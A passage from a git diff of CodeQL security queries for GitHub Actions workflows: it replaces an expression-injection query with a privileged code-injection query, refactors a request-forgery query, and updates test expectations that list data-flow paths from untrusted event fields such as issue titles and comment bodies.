TaintTracking::Global; - -import MyFlow::PathGraph - -from MyFlow::PathNode source, MyFlow::PathNode sink, Workflow w -where - MyFlow::flowPath(source, sink) and - w = source.getNode().asExpr().getEnclosingWorkflow() and - ( - w instanceof ReusableWorkflow or - w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) - ) -select sink.getNode(), source, sink, - "Potential expression injection in $@, which may be controlled by an external user.", sink, - sink.getNode().asExpr().(Expression).getExpression() diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql deleted file mode 100644 index 1e7414e5ce6..00000000000 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ /dev/null @@ -1,42 +0,0 @@ -/** - * @name Expression injection in Actions - * @description Using user-controlled GitHub Actions contexts like `run:` or `script:` may allow a malicious - * user to inject code into the GitHub action. - * @kind path-problem - * @problem.severity warning - * @security-severity 5.0 - * @precision high - * @id actions/expression-injection - * @tags actions - * security - * external/cwe/cwe-094 - */ - -import actions -import codeql.actions.DataFlow -import codeql.actions.TaintTracking -import codeql.actions.dataflow.FlowSources -import codeql.actions.dataflow.ExternalFlow - -private class ExpressionInjectionSink extends DataFlow::Node { - ExpressionInjectionSink() { - exists(Run e | e.getAnScriptExpr() = this.asExpr()) or - externallyDefinedSink(this, "expression-injection") - } -} - -private module MyConfig implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } - - predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } -} - -module MyFlow = TaintTracking::Global; - -import MyFlow::PathGraph - -from MyFlow::PathNode source, MyFlow::PathNode sink -where MyFlow::flowPath(source, sink) -select sink.getNode(), source, sink, - "Potential expression injection in $@, which may be controlled by an external user.", sink, - sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql b/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql new file mode 100644 index 00000000000..69ab240616e --- /dev/null +++ b/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql @@ -0,0 +1,31 @@ +/** + * @name Code injection on a privileged context + * @description Interpreting unsanitized user input as code allows a malicious user to perform arbitrary + * code execution. + * @kind path-problem + * @problem.severity error + * @security-severity 9 + * @precision high + * @id actions/privileged-code-injection + * @tags actions + * security + * external/cwe/cwe-094 + * external/cwe/cwe-095 + * external/cwe/cwe-116 + */ + +import actions +import codeql.actions.security.CodeInjectionQuery +import CodeInjectionFlow::PathGraph + +from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, Workflow w +where + CodeInjectionFlow::flowPath(source, sink) and + w = source.getNode().asExpr().getEnclosingWorkflow() and + ( + w instanceof ReusableWorkflow or + w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) + ) +select sink.getNode(), source, sink, + "Potential privileged code injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-918/RequestForgery.ql b/ql/src/Security/CWE-918/RequestForgery.ql index 228c94f383b..3700201c315 100644 --- a/ql/src/Security/CWE-918/RequestForgery.ql +++ b/ql/src/Security/CWE-918/RequestForgery.ql @@ -12,27 +12,11 @@ */ import actions -import codeql.actions.DataFlow -import codeql.actions.TaintTracking -import codeql.actions.dataflow.FlowSources -import codeql.actions.dataflow.ExternalFlow +import codeql.actions.security.RequestForgeryQuery +import RequestForgeryFlow::PathGraph -private class RequestForgerySink extends DataFlow::Node { - RequestForgerySink() { externallyDefinedSink(this, "request-forgery") } -} - -private module MyConfig implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } - - predicate isSink(DataFlow::Node sink) { sink instanceof RequestForgerySink } -} - -module MyFlow = TaintTracking::Global; - -import MyFlow::PathGraph - -from MyFlow::PathNode source, MyFlow::PathNode sink -where MyFlow::flowPath(source, sink) +from RequestForgeryFlow::PathNode source, RequestForgeryFlow::PathNode sink +where RequestForgeryFlow::flowPath(source, sink) select sink.getNode(), source, sink, "Potential request forgery in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.qlref b/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.qlref deleted file mode 100644 index ceb027c8058..00000000000 --- a/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-078/CriticalCommandInjection.ql diff --git a/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.expected b/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.expected similarity index 58% rename from ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.expected rename to ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.expected index 8a3d19402b7..13d146a2570 100644 --- a/ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.expected +++ b/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.expected @@ -3,4 +3,4 @@ nodes | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select -| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential critical command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential privileged command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.qlref b/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.qlref new file mode 100644 index 00000000000..2c7cc5c5fde --- /dev/null +++ b/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.qlref @@ -0,0 +1 @@ +Security/CWE-078/PrivilegedCommandInjection.ql diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index 4ef832d9d22..23e50256756 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -1,14 +1,286 @@ edges +| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | +| .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | +| .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | +| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | +| .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | +| .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | +| .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | +| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | +| .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | +| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | +| .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | +| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | +| .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | +| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | +| .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | +| .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | +| .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | +| .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | +| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | +| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | +| .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | +| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | +| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | +| .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | +| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | +| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | +| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | +| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | +| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | +| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | +| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | nodes +| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | +| .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | +| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | +| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | +| .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | +| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | +| .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | semmle.label | github.event.commits[0].message | +| .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | semmle.label | env.ISSUE_BODY_PARSED | +| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | semmle.label | env.pr_message | +| .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | semmle.label | env.ISSUE_BODY_PARSED | +| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | semmle.label | github.event.discussion.title | +| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | semmle.label | github.event.discussion.body | +| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | semmle.label | github.event.discussion.title | +| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | semmle.label | github.event.discussion.body | +| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | semmle.label | github.event.pages[1].title | +| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | semmle.label | github.event.pages[11].title | +| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | semmle.label | github.event.pages[0].page_name | +| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | semmle.label | github.event.pages[2222].page_name | +| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | semmle.label | Run Step: extract-url [initial_url] | +| .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | semmle.label | Run Step: curl [redirected_url] | +| .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | semmle.label | steps.extract-url.outputs.initial_url | +| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | semmle.label | Run Step: trim-url [trimmed_url] | +| .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | semmle.label | steps.curl.outputs.redirected_url | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | semmle.label | steps.trim-url.outputs.trimmed_url | +| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | semmle.label | env.global_env | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | semmle.label | env.job_env | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | semmle.label | env.step_env | +| .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | semmle.label | github.event.review.body | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | semmle.label | github.head_ref | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | semmle.label | github.event.commits[11].message | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | semmle.label | github.event.commits[11].author.email | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | semmle.label | github.event.commits[11].author.name | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | semmle.label | github.event.head_commit.author.email | +| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | semmle.label | github.event.head_commit.author.name | +| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | semmle.label | github.event.head_commit.committer.email | +| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | +| .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | +| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | semmle.label | needs.test1.outputs.job_output | +| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | +| .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | semmle.label | steps.summary.outputs.value | +| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | semmle.label | steps.step2.outputs.test | +| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | +| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | +| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | +| .github/workflows/test.yml:20:18:20:48 | 